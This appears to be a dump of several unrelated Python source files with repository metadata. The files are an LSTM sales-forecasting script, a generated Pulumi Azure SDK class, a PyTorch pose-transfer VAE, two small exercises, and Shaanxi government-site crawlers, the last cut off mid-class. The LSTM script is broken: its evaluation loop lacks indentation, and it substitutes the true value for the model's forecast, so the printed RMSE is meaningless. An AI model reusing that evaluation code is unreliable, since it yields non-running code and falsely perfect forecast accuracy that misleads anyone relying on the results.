821583d4265912317ba78ca240cc3cdf2b4aad18
|
/LSTM_Stock.py
|
95621c05e18188e54f5763cb940cafc71bcd324c
|
[] |
no_license
|
Soumi7/PG-StockManagement
|
5f0f6ba98e00169f98dc97298d1695c52c8de257
|
b5e4e7a715ecd7c054c22228542332202e104515
|
refs/heads/master
| 2023-03-03T00:07:02.770993 | 2021-01-31T14:48:13 | 2021-01-31T14:48:13 | 261,162,601 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,959 |
py
|
from pandas import DataFrame
from pandas import Series
from pandas import concat
from pandas import read_csv
from datetime import datetime
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from math import sqrt
from matplotlib import pyplot
import numpy
# date-time parsing function for loading the dataset
# date-time parsing function for loading the dataset
def parser(x):
    """Turn a truncated stamp like '9-07' into a datetime by prefixing '201'."""
    full_stamp = '201' + x
    return datetime.strptime(full_stamp, '%Y-%m')
# frame a sequence as a supervised learning problem
def timeseries_to_supervised(data, lag=1):
    """Frame a series as supervised learning: *lag* shifted columns + the value.

    Leading NaNs produced by the shift are replaced with 0.
    """
    frame = DataFrame(data)
    columns = [frame.shift(offset) for offset in range(1, lag + 1)]
    columns.append(frame)
    supervised = concat(columns, axis=1)
    supervised.fillna(0, inplace=True)
    return supervised
# create a differenced series
def difference(dataset, interval=1):
    """Return the differenced series dataset[i] - dataset[i-interval]."""
    deltas = [
        dataset[i] - dataset[i - interval]
        for i in range(interval, len(dataset))
    ]
    return Series(deltas)
# invert differenced value
def inverse_difference(history, yhat, interval=1):
    """Undo differencing: add back the value *interval* steps from the end."""
    base = history[-interval]
    return yhat + base
# scale train and test data to [-1, 1]
def scale(train, test):
    """Fit a [-1, 1] MinMaxScaler on *train* and transform both sets.

    Returns (scaler, scaled_train, scaled_test) so predictions can later be
    mapped back to the original units.
    """
    # fit scaler on the training data only (no test leakage)
    scaler = MinMaxScaler(feature_range=(-1, 1))
    scaler = scaler.fit(train)
    # transform train
    train_2d = train.reshape(train.shape[0], train.shape[1])
    train_scaled = scaler.transform(train_2d)
    # transform test
    test_2d = test.reshape(test.shape[0], test.shape[1])
    test_scaled = scaler.transform(test_2d)
    return scaler, train_scaled, test_scaled
# inverse scaling for a forecasted value
def invert_scale(scaler, X, value):
    """Map one scaled prediction back to original units via *scaler*.

    The input row X is appended with *value* so the scaler sees a full-width
    row; only the last (inverted) element is returned.
    """
    row = list(X) + [value]
    arr = numpy.array(row).reshape(1, len(row))
    restored = scaler.inverse_transform(arr)
    return restored[0, -1]
# fit an LSTM network to training data
def fit_lstm(train, batch_size, nb_epoch, neurons):
    """Train a stateful LSTM on rows of [lag features..., target].

    State is reset manually between epochs (stateful=True keeps it across
    batches within an epoch); shuffling is disabled to preserve time order.
    """
    features, target = train[:, 0:-1], train[:, -1]
    features = features.reshape(features.shape[0], 1, features.shape[1])
    network = Sequential()
    network.add(LSTM(neurons, batch_input_shape=(batch_size, features.shape[1], features.shape[2]), stateful=True))
    network.add(Dense(1))
    network.compile(loss='mean_squared_error', optimizer='adam')
    for _ in range(nb_epoch):
        network.fit(features, target, epochs=1, batch_size=batch_size, verbose=0, shuffle=False)
        network.reset_states()
    return network
# make a one-step forecast
def forecast_lstm(model, batch_size, X):
    """Predict a single next value from one input row *X*."""
    row = X.reshape(1, 1, len(X))
    prediction = model.predict(row, batch_size=batch_size)
    return prediction[0, 0]
# load dataset
series = read_csv('Sales.csv', header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)
# transform data to be stationary
raw_values = series.values
diff_values = difference(raw_values, 1)
# transform data to be supervised learning
supervised = timeseries_to_supervised(diff_values, 1)
supervised_values = supervised.values
# split data into train and test-sets
train, test = supervised_values[0:-3], supervised_values[-3:]
# transform the scale of the data
scaler, train_scaled, test_scaled = scale(train, test)
# fit the model
lstm_model = fit_lstm(train_scaled, 1, 3000, 4)
# forecast the entire training dataset to build up state for forecasting
train_reshaped = train_scaled[:, 0].reshape(len(train_scaled), 1, 1)
lstm_model.predict(train_reshaped, batch_size=1)
# walk-forward validation on the test data
predictions = list()
for i in range(len(test_scaled)):
# make one-step forecast
X, y = test_scaled[i, 0:-1], test_scaled[i, -1]
yhat = y
# invert scaling
yhat = invert_scale(scaler, X, yhat)
# invert differencing
yhat = inverse_difference(raw_values, yhat, len(test_scaled)+1-i)
# store forecast
predictions.append(yhat)
expected = raw_values[len(train) + i + 1]
print('Month=%d, Predicted=%f, Expected=%f' % (i+1, yhat, expected))
# report performance
rmse = sqrt(mean_squared_error(raw_values[-3:], predictions))
print('Test RMSE: %.3f' % rmse)
# line plot of observed vs predicted
pyplot.plot(raw_values[-3:])
pyplot.plot(predictions)
pyplot.show()
|
[
"[email protected]"
] | |
87fa353d224bca02fb3655134746bec120ffc10b
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py
|
09d6082a067f10eae575fb0b3681e034d10ed7c2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 |
Apache-2.0
| 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null |
UTF-8
|
Python
| false | false | 7,987 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
    # NOTE: this class lives in a generated SDK file (see the file header);
    # hand edits will be overwritten on the next codegen run.
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 gallery_application_name: Optional[pulumi.Input[str]] = None,
                 gallery_application_version_name: Optional[pulumi.Input[str]] = None,
                 gallery_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None,
                 __name__=None,
                 __opts__=None):
        """
        Specifies information about the gallery Application Version that you want to create or update.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
        :param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
        :param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
        :param pulumi.Input[str] location: Resource location
        :param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
        :param pulumi.Input[str] resource_group_name: The name of the resource group.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
        """
        # Support the deprecated __name__/__opts__ calling convention.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required inputs and build props.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()

            if gallery_application_name is None:
                raise TypeError("Missing required property 'gallery_application_name'")
            __props__['gallery_application_name'] = gallery_application_name
            if gallery_application_version_name is None:
                raise TypeError("Missing required property 'gallery_application_version_name'")
            __props__['gallery_application_version_name'] = gallery_application_version_name
            if gallery_name is None:
                raise TypeError("Missing required property 'gallery_name'")
            __props__['gallery_name'] = gallery_name
            if location is None:
                raise TypeError("Missing required property 'location'")
            __props__['location'] = location
            if publishing_profile is None:
                raise TypeError("Missing required property 'publishing_profile'")
            __props__['publishing_profile'] = publishing_profile
            if resource_group_name is None:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__['resource_group_name'] = resource_group_name
            __props__['tags'] = tags
            # Output-only properties start as None and are filled by the engine.
            __props__['name'] = None
            __props__['provisioning_state'] = None
            __props__['replication_status'] = None
            __props__['type'] = None
        # Aliases let state created under other API versions migrate cleanly.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(GalleryApplicationVersion, __self__).__init__(
            'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
        """
        Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = dict()

        return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        Resource location
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Resource name
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        The provisioning state, which only appears in the response.
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter(name="publishingProfile")
    def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
        """
        The publishing profile of a gallery Image Version.
        """
        return pulumi.get(self, "publishing_profile")

    @property
    @pulumi.getter(name="replicationStatus")
    def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
        """
        This is the replication status of the gallery Image Version.
        """
        return pulumi.get(self, "replication_status")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Resource tags
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Resource type
        """
        return pulumi.get(self, "type")

    def translate_output_property(self, prop):
        # Map provider camelCase property names to Python snake_case.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        # Map Python snake_case property names back to provider camelCase.
        return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
be18a828d415817294724c04ce3bef696dac9a91
|
d9af3a98a0864de7ebb0cfd1675a052779e46bf2
|
/transformer_split/vae_model.py
|
e94ea7dccaf8599afbe98b4b7e286dfb52f4a1af
|
[
"MIT"
] |
permissive
|
fredericgo/rl_morph_pytorch
|
eafc36128e60296743a42b25d417efe17128ac93
|
743cd82d82c16c8d52e5265b6cc5cdf490cb8945
|
refs/heads/main
| 2023-07-11T05:51:43.914695 | 2021-08-09T02:54:06 | 2021-08-09T02:54:06 | 344,523,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,741 |
py
|
import os
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
import numpy as np
from transformer_split.encoders import PoseEncoder
from transformer_split.decoder import Decoder
from transformer_split.discriminator import Discriminator
def kl_divergence(mu, logvar):
    """Mean KL divergence between N(mu, exp(logvar)) and the standard normal.

    Computed element-wise and averaged over all elements of the batch.
    """
    elementwise = 1 + logvar - mu.pow(2) - logvar.exp()
    return -0.5 * elementwise.mean()
def mse_loss(input, target):
    """Mean squared error between *input* and *target* (same shape)."""
    squared_error = (input - target) ** 2
    return squared_error.mean()
def frange_cycle_linear(start, stop, n_epoch, n_cycle=4, ratio=0.5):
    """Cyclical linear annealing schedule over *n_epoch* slots.

    The array is split into *n_cycle* equal cycles.  During the first
    *ratio* fraction of each cycle the value ramps linearly from *start*
    up to *stop*; the rest of the cycle keeps the array default of 1.0.
    Returns a numpy array of length *n_epoch*.
    """
    schedule = np.ones(n_epoch)
    period = n_epoch / n_cycle
    step = (stop - start) / (period * ratio)  # slope of each ramp
    for cycle in range(n_cycle):
        value = start
        idx = 0
        # Walk up the ramp until we pass *stop* or run off the array.
        while value <= stop and int(idx + cycle * period) < n_epoch:
            schedule[int(idx + cycle * period)] = value
            value += step
            idx += 1
    return schedule
class VAE_Model(nn.Module):
    """Adversarial pose-transfer VAE.

    The encoder maps a body pose to a pose code ``zp`` and a content code
    ``zc`` (with ``mean``/``logvar`` for the KL term); the decoder rebuilds
    a pose for a target skeleton ``structure``; the discriminator judges
    (reference pose, generated pose) pairs.  Three optimizers are used:
    reconstruction+KL, generator, and discriminator.
    """
    def __init__(self, args):
        super(VAE_Model, self).__init__()
        enc = PoseEncoder(
            root_size=args.root_size,
            feature_size=args.dim_per_limb,
            latent_size=args.latent_dim,
            batch_size=args.batch_size,
            ninp=args.attention_embedding_size,
            nhead=args.attention_heads,
            nhid=args.attention_hidden_size,
            nlayers=args.attention_layers,
            max_num_limbs=args.max_num_limbs,
            dropout=args.dropout_rate
        )
        decoder = Decoder(
            root_size=args.root_size,
            feature_size=args.dim_per_limb,
            latent_size=args.latent_dim,
            batch_size=args.batch_size,
            ninp=args.attention_embedding_size,
            nhead=args.attention_heads,
            nhid=args.attention_hidden_size,
            nlayers=args.attention_layers,
            max_num_limbs=args.max_num_limbs,
            dropout=args.dropout_rate
        )
        discriminator = Discriminator(
            root_size=args.root_size,
            feature_size=args.dim_per_limb,
            max_num_limbs=args.max_num_limbs
        )
        # Register submodules so .parameters()/.to() see them.
        self.add_module("enc", enc)
        self.add_module("decoder", decoder)
        self.add_module("discriminator", discriminator)
        self.batch_size = args.batch_size
        self.latent_dim = args.latent_dim
        encoder_parameters = list(self.enc.parameters())
        # Encoder+decoder trained jointly for reconstruction ...
        self.auto_encoder_optimizer = optim.Adam(
            encoder_parameters + list(self.decoder.parameters()),
            lr=args.ae_lr,
        )
        # ... and, with a separate optimizer/lr, as the GAN generator.
        self.discriminator_optimizer = optim.Adam(
            list(self.discriminator.parameters()),
            lr=args.lr,
        )
        self.generator_optimizer = optim.Adam(
            encoder_parameters + list(self.decoder.parameters()),
            lr=args.lr,
        )
        self.beta = args.beta
        self.device = torch.device("cuda" if args.cuda else "cpu")
        self.root_size = args.root_size
        # Discriminator updates are skipped once it gets this accurate.
        self.discriminator_limiting_accuracy = args.discriminator_limiting_accuracy
        self.gp_weight = args.gradient_penalty
        # Cyclic KL weight; ratio=1 means each cycle ramps for its full length.
        self.beta_schedule = frange_cycle_linear(0, args.beta, args.epochs, 4, 1)
    def _gradient_penalty(self, D, real_data, generated_data):
        """WGAN-GP penalty for discriminator D on the given sample pairs.

        *real_data*/*generated_data* are tuples of tensors that are
        concatenated, interpolated, then split back before calling D.
        Currently unused (its call site in train_discriminator is
        commented out).
        """
        real_data = torch.cat(real_data, dim=-1)
        generated_data = torch.cat(generated_data, dim=-1)
        batch_size = real_data.size()[0]
        d = int(real_data.size()[1] / 2)
        # Calculate interpolation
        alpha = torch.rand(batch_size, 1, device=real_data.device, requires_grad=True)
        alpha = alpha.expand_as(real_data)
        alpha = alpha.to(generated_data.device)
        interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data
        interpolated = torch.split(interpolated, [d, d], dim=-1)
        # Calculate probability of interpolated examples
        prob_interpolated = D(*interpolated)
        # Calculate gradients of probabilities with respect to examples
        gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,
                                        grad_outputs=torch.ones(prob_interpolated.size(),
                                                                device=real_data.device),
                                        create_graph=True, retain_graph=True)[0]
        # Gradients have shape (batch_size, num_channels, img_width, img_height),
        # so flatten to easily take norm per example in batch
        gradients = gradients.view(batch_size, -1)
        # Derivatives of the gradient close to 0 can cause problems because of
        # the square root, so manually calculate norm and add epsilon
        gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)
        # Return gradient penalty
        return ((gradients_norm - 1) ** 2).mean()
    def split_root_body(self, x):
        # Split a pose row into root features (first root_size columns)
        # and per-limb body features (the rest).
        x_root = x[:, :self.root_size]
        x_body = x[:, self.root_size:]
        return x_root, x_body
    def transfer(self, x, structure):
        """Re-target pose *x* onto skeleton *structure*, keeping its root."""
        x_root, x_body = self.split_root_body(x)
        zp, zc, mean, logvar = self.enc(x_body)
        xr = self.decoder(zp, zc, structure)
        xr = torch.cat([x_root, xr], dim=-1)
        return xr
    def train_recon(self, x1, x2, structure, epoch):
        """One cross-reconstruction step: swap content codes between x1/x2.

        Returns (rec_loss1, rec_loss1, kl, beta, mean, logvar) — see note.
        """
        self.auto_encoder_optimizer.zero_grad()
        x1_root, x1_body = self.split_root_body(x1)
        x2_root, x2_body = self.split_root_body(x2)
        # NOTE(review): the second call overwrites mean/logvar, so the KL
        # term below only covers x2's posterior — confirm this is intended.
        zp_1, zc_1, mean, logvar = self.enc(x1_body)
        zp_2, zc_2, mean, logvar = self.enc(x2_body)
        x1_r_body = self.decoder(zp_1, zc_2, structure)
        x2_r_body = self.decoder(zp_2, zc_1, structure)
        # kl_divergence already returns a scalar mean; the extra .mean() is a no-op.
        kl_loss = kl_divergence(mean, logvar).mean()
        rec_loss1 = mse_loss(x1_r_body, x1_body)
        rec_loss2 = mse_loss(x2_r_body, x2_body)
        reconstruction_loss = rec_loss1 + rec_loss2
        loss = reconstruction_loss + self.beta_schedule[epoch] * kl_loss
        loss.backward()
        torch.nn.utils.clip_grad_norm_(self.parameters(), 0.5)
        self.auto_encoder_optimizer.step()
        # NOTE(review): rec_loss1 is returned twice; the second element was
        # presumably meant to be rec_loss2.
        return rec_loss1, rec_loss1, kl_loss, self.beta_schedule[epoch], mean.mean(), logvar.mean()
    def train_generator(self, x1, x3, structure3, epoch):
        """One generator step: fool the discriminator with transferred poses."""
        self.generator_optimizer.zero_grad()
        x1_root, x1_body = self.split_root_body(x1)
        x3_root, x3_body = self.split_root_body(x3)
        # zc: class content
        zp_1, zc, mean, logvar = self.enc(x1_body)
        xr_13 = self.decoder(zp_1, zc, structure3)
        kl_loss = kl_divergence(mean, logvar).mean()
        # True labels
        true_labels = torch.ones(self.batch_size,
                                 dtype=torch.long,
                                 device=x1.device)
        d1 = self.discriminator(x3_body, xr_13)
        gen_loss_1 = F.cross_entropy(d1, true_labels)
        # Second term: decode from a random pose code with the same content.
        z_random = torch.normal(0, 1,
                                size=(self.batch_size, self.latent_dim),
                                device=x1.device)
        xr_r3 = self.decoder(z_random, zc, structure3)
        d2 = self.discriminator(x3_body, xr_r3)
        gen_loss_2 = F.cross_entropy(d2, true_labels)
        generator_loss = gen_loss_1 + gen_loss_2 + self.beta_schedule[epoch]* kl_loss
        generator_loss.backward()
        self.generator_optimizer.step()
        return gen_loss_1, gen_loss_2, kl_loss
    def train_discriminator(self, x1, x2, x3, structure3):
        """One discriminator step; update is skipped above the accuracy cap."""
        self.discriminator_optimizer.zero_grad()
        x1_root, x1_body = self.split_root_body(x1)
        x2_root, x2_body = self.split_root_body(x2)
        # NOTE(review): tuple target reuses x2_root (likely a typo for
        # x3_root); harmless here because the root part is never used.
        x2_root, x3_body = self.split_root_body(x3)
        true_labels = torch.ones(self.batch_size,
                                 dtype=torch.long,
                                 device=x1.device)
        d_real = self.discriminator(x2_body, x3_body)
        disc_loss_real = F.cross_entropy(d_real, true_labels)
        fake_labels = torch.zeros(self.batch_size,
                                  dtype=torch.long,
                                  device=x1.device)
        zp_1, zc, mean, logvar = self.enc(x1_body)
        xr_13 = self.decoder(zp_1, zc, structure3)
        d_fake = self.discriminator(x3_body, xr_13)
        disc_loss_fake = F.cross_entropy(d_fake, fake_labels)
        #gp = self.gp_weight * self._gradient_penalty(self.discriminator,
        #                                             (x2_body, x3_body),
        #                                             (x2_body, xr_13))
        discriminator_loss = disc_loss_real + disc_loss_fake #+ gp
        discriminator_loss.backward()
        # calculate discriminator accuracy for this step
        target_true_labels = torch.cat((true_labels, fake_labels), dim=0)
        discriminator_predictions = torch.cat((d_real, d_fake), dim=0)
        _, discriminator_predictions = torch.max(discriminator_predictions, 1)
        discriminator_accuracy = (discriminator_predictions.data == target_true_labels.long()
                                  ).sum().item() / (self.batch_size * 2)
        # Only step while the discriminator is below the accuracy cap, to
        # keep it from overpowering the generator.
        if discriminator_accuracy < self.discriminator_limiting_accuracy:
            self.discriminator_optimizer.step()
        return discriminator_loss, discriminator_accuracy
    def save_model(self, path):
        """Save encoder/decoder/discriminator weights under path/vae_model."""
        model_path = os.path.join(path, 'vae_model')
        torch.save({
            "encoder": self.enc.state_dict(),
            "decoder": self.decoder.state_dict(),
            "discriminator": self.discriminator.state_dict(),
        }, model_path)
    def load_model(self, path):
        """Restore weights previously written by save_model()."""
        model_path = os.path.join(path, 'vae_model')
        data = torch.load(model_path)
        self.enc.load_state_dict(data['encoder'])
        self.decoder.load_state_dict(data['decoder'])
        self.discriminator.load_state_dict(data['discriminator'])
|
[
"[email protected]"
] | |
d15c621a094a3c2cf7b702955d0c138a4f2bb86c
|
0c599f1f7c79972515fc3eb9ba5fc76ccdaf511c
|
/exe06.py
|
9be15de64396c8e6a55785ab04b06928da90579a
|
[
"MIT"
] |
permissive
|
douglasdsantos/Exercicios_Python
|
3edca5cd88953d849047572f7761421e9797fec0
|
48019efaef4a5723719b1a4a602b8bee4a7d8ea3
|
refs/heads/master
| 2020-12-03T00:31:06.395893 | 2017-07-06T01:12:30 | 2017-07-06T01:12:30 | 96,038,250 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 266 |
py
|
# Exercise (translated): write a program that asks for a circle's radius,
# then computes and prints its area.
pi = 3.14  # NOTE(review): math.pi would be more precise; kept as written.
raio_circulo = float(input('Digite o raio do circulo: '))  # raises ValueError on non-numeric input
area_circulo = pi * (raio_circulo * raio_circulo)  # area = pi * r**2
print('A área do circulo é e {:.2f}m². '.format(area_circulo))
|
[
"[email protected]"
] | |
681af06de15223aa0c77bde8bd654abf013d3097
|
10ef0d072799dfd8ad5cf00b43755eeef2235692
|
/Harmonic.py
|
b872a07867153b8faa736d1780c23b34f6aa5c1e
|
[] |
no_license
|
naveenkommineni/Week3
|
a197dc2b9ed50ad544a32e0844bf3fe7fd9e0e84
|
484cd630322b820ef793986366f004ab88da5b81
|
refs/heads/master
| 2022-04-22T14:39:22.722987 | 2020-04-20T10:45:05 | 2020-04-20T10:45:05 | 256,490,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
# Compute the nth harmonic number H(n) = 1 + 1/2 + ... + 1/n.
n = int(input('Enter number:'))
# Fixed: the accumulator was named `sum`, shadowing the builtin.
total = 1
for i in range(2, n + 1):
    total += 1 / i
print("nth harmonic number is", total)
|
[
"[email protected]"
] | |
18dca8071c100f0cf88bc13f0f558c9f7ca0a546
|
bac4d78b7dcdc46a28d14241454e7ac1caa68cfd
|
/worker/Shan3XiCrawler.py
|
8189d5790c331d41df3a30c22c9db737249400de
|
[
"MIT"
] |
permissive
|
xfrzrcj/SCCrawler
|
2dc230f807e9e1c1a6f9a6f399c8925e0c5c93e0
|
cbb6163f73f6a47eccffec481ff2fdf869ba5eb2
|
refs/heads/master
| 2020-03-19T13:06:21.149501 | 2018-06-08T03:29:13 | 2018-06-08T03:29:13 | 136,561,091 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,168 |
py
|
from worker import Crawler
import pymysql
import re
baseUrl = "http://www.qinfeng.gov.cn/"
sggbZjscIndexUrl = baseUrl + "scdc/sggb/zjsc.htm"
sggbDjcfIndexUrl = "http://www.qinfeng.gov.cn/scdc/sggb/djzwcf.htm"
qtgbZjscIndexUrl = baseUrl + "scdc/qtgb/zjsc.htm"
sqtgbDjcfIndexUrl = "http://www.qinfeng.gov.cn/scdc/qtgb/djzwcf.htm"
class SXSggbZjscCrawler(Crawler.CrawlerInterface):
    """Crawler for the Shaanxi qinfeng.gov.cn section tagged
    "省管干部,执纪审查" (provincially-managed cadres, disciplinary review).
    """
    def get_num(self):
        # The pager cell holds "current/total"; return the total page count.
        soup = self.get_soup(sggbZjscIndexUrl)
        a = soup.find("td", id="fanye1948")
        num = a.text
        num = re.findall("[0-9]+/[0-9]*", num)
        num = num[0].split("/")[1]
        return int(num)
    def get_index(self):
        # Entry/index page of this section.
        return sggbZjscIndexUrl
    def join_url(self, i):
        # URL of the i-th listing page of this section.
        url = baseUrl+"scdc/sggb/zjsc/"+str(i)+".htm"
        return url
    def get_urls(self, url):
        # Collect absolute article URLs from one listing page.
        soup = self.get_soup(url)
        lists = soup.find("ul", class_="xsxc_index_center_list")
        tags = lists.find_all("a")
        urls = []
        for tag in tags:
            info_url = baseUrl + tag.get('href').replace("../", "")
            urls.append(info_url)
        return urls
    def get_info(self, url):
        # Parse one article page into a Crawler.Info record
        # (title, date, and the concatenated paragraph text).
        info_result = Crawler.Info()
        info_result.url = url
        soup = self.get_soup(url)
        title = soup.find("div", class_="article_title")
        info_result.title = title.text
        info_result.time = soup.find("div", class_="article_date").text
        article = soup.find("div", class_="v_news_content")
        ps = article.find_all("p")
        text = ""
        for p in ps:
            text = text + p.text.replace("\t", "") + "\n"
        self.get_resum_description_from_text(text, info_result)
        return info_result
    def process_info(self, info):
        # Strip field labels and tag the record with province and category.
        info.province = "陕西"
        info.source = info.source.replace("来源:", "")
        info.time = info.time.replace("发布时间:", "")
        info.postion = "省管干部,执纪审查"
        return info
class SXSggbDjcfCrawler(Crawler.CrawlerInterface):
    """Crawler for the Shaanxi qinfeng.gov.cn section tagged
    "省管干部,党纪政务处分" (provincially-managed cadres, sanctions).
    """
    def get_num(self):
        # The pager cell holds "current/total"; return the total page count.
        soup = self.get_soup(sggbDjcfIndexUrl)
        a = soup.find("td", id="fanye1948")
        num = a.text
        num = re.findall("[0-9]+/[0-9]*", num)
        num = num[0].split("/")[1]
        return int(num)
    def get_index(self):
        # Entry/index page of this section.
        return sggbDjcfIndexUrl
    def join_url(self, i):
        # URL of the i-th listing page of this section.
        url = baseUrl+"scdc/sggb/djzwcf/"+str(i)+".htm"
        return url
    def get_urls(self, url):
        # Collect absolute article URLs from one listing page.
        soup = self.get_soup(url)
        lists = soup.find("ul", class_="xsxc_index_center_list")
        tags = lists.find_all("a")
        urls = []
        for tag in tags:
            info_url = baseUrl + tag.get('href').replace("../", "")
            urls.append(info_url)
        return urls
    def get_info(self, url):
        # Parse one article page into a Crawler.Info record.
        info_result = Crawler.Info()
        info_result.url = url
        soup = self.get_soup(url)
        title = soup.find("div", class_="article_title")
        info_result.title = title.text
        info_result.time = soup.find("div", class_="article_date").text
        article = soup.find("div", class_="v_news_content")
        ps = article.find_all("p")
        text = ""
        for p in ps:
            text = text + p.text.replace("\t", "") + "\n"
        self.get_resum_description_from_text(text, info_result)
        return info_result
    def process_info(self, info):
        # Strip field labels and tag the record with province and category.
        info.province = "陕西"
        info.source = info.source.replace("来源:", "")
        info.time = info.time.replace("发布时间:", "")
        info.postion = "省管干部,党纪政务处分"
        return info
class SXQtgbDjcfCrawler(Crawler.CrawlerInterface):
    """Crawler for the Shaanxi qinfeng.gov.cn section tagged
    "其他干部,党纪政务处分" (other cadres, sanctions).
    """
    def get_num(self):
        # The pager cell holds "current/total"; return the total page count.
        soup = self.get_soup(sqtgbDjcfIndexUrl)
        a = soup.find("td", id="fanye1948")
        num = a.text
        num = re.findall("[0-9]+/[0-9]*", num)
        num = num[0].split("/")[1]
        return int(num)
    def get_index(self):
        # Entry/index page of this section.
        return sqtgbDjcfIndexUrl
    def join_url(self, i):
        # URL of the i-th listing page of this section.
        url = baseUrl+"scdc/qtgb/djzwcf/"+str(i)+".htm"
        return url
    def get_urls(self, url):
        # Collect absolute article URLs from one listing page.
        soup = self.get_soup(url)
        lists = soup.find("ul", class_="xsxc_index_center_list")
        tags = lists.find_all("a")
        urls = []
        for tag in tags:
            info_url = baseUrl + tag.get('href').replace("../", "")
            urls.append(info_url)
        return urls
    def get_info(self, url):
        # Parse one article page into a Crawler.Info record.
        info_result = Crawler.Info()
        info_result.url = url
        soup = self.get_soup(url)
        title = soup.find("div", class_="article_title")
        info_result.title = title.text
        info_result.time = soup.find("div", class_="article_date").text
        article = soup.find("div", class_="v_news_content")
        ps = article.find_all("p")
        text = ""
        for p in ps:
            text = text + p.text.replace("\t", "") + "\n"
        self.get_resum_description_from_text(text, info_result)
        return info_result
    def process_info(self, info):
        # Strip field labels and tag the record with province and category.
        info.province = "陕西"
        info.source = info.source.replace("来源:", "")
        info.time = info.time.replace("发布时间:", "")
